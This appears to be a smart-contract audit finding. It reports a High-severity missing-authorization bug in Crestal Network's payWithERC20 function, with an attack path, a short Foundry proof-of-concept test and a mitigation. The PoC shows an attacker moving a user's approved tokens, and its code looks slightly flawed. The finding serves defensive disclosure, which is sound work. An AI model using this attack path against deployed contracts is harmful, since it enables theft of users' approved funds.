Exotic Hemp Porpoise

High

# Any caller can initiate unauthorized token transfers from users who have approved the contract.

### Summary

A missing caller authentication check in the [payWithERC20](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/Payment.sol#L25) function will cause unauthorized token transfers for users who have granted token allowances, as any caller will be able to invoke the function to move tokens from an approved fromAddress without the owner's check


### Root Cause

In [payWithERC20()](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/Payment.sol#L25) , the function allows any caller to transfer tokens from any fromAddress that has approved the contract. The function does not validate whether the caller is authorized to perform the transfer on behalf of fromAddress.

### Internal Pre-conditions

User needs to approve the contract to spend their tokens by calling approve() on the ERC20 token contract.

### External Pre-conditions

The fromAddress must have a sufficient token balance and allowance for the contract.

### Attack Path

1. User approves the contract to spend their tokens by calling approve(contractAddress, amount) on the ERC20 token contract.

2. Attacker calls payWithERC20(erc20TokenAddress, amount, fromAddress, attackerAddress), where fromAddress is the user’s address.

3. The contract transfers amount tokens from fromAddress to attackerAddress without validating the caller’s authorization.

### Impact

Users suffer a complete loss of funds up to their approved allowance.

### PoC

```solidity 

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";

contract Exploit is Test {
    address public user = address(0x123);
    address public attacker = address(0x456);
    address public tokenAddress = address(0x789);
    address public contractAddress = address(this);

    function testExploit() public {
        // User approves the contract to spend 100 tokens
        vm.prank(user);
        IERC20(tokenAddress).approve(contractAddress, 100);

        // Attacker calls payWithERC20 to steal tokens
        vm.prank(attacker);
        payWithERC20(tokenAddress, 100, user, attacker);

        // Attacker now has 100 tokens
        uint256 attackerBalance = IERC20(tokenAddress).balanceOf(attacker);
        assertEq(attackerBalance, 100);
    }

    function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }
}
```

### Mitigation

1. add a check for Addressfrom == msg.sender 
2. make it internal 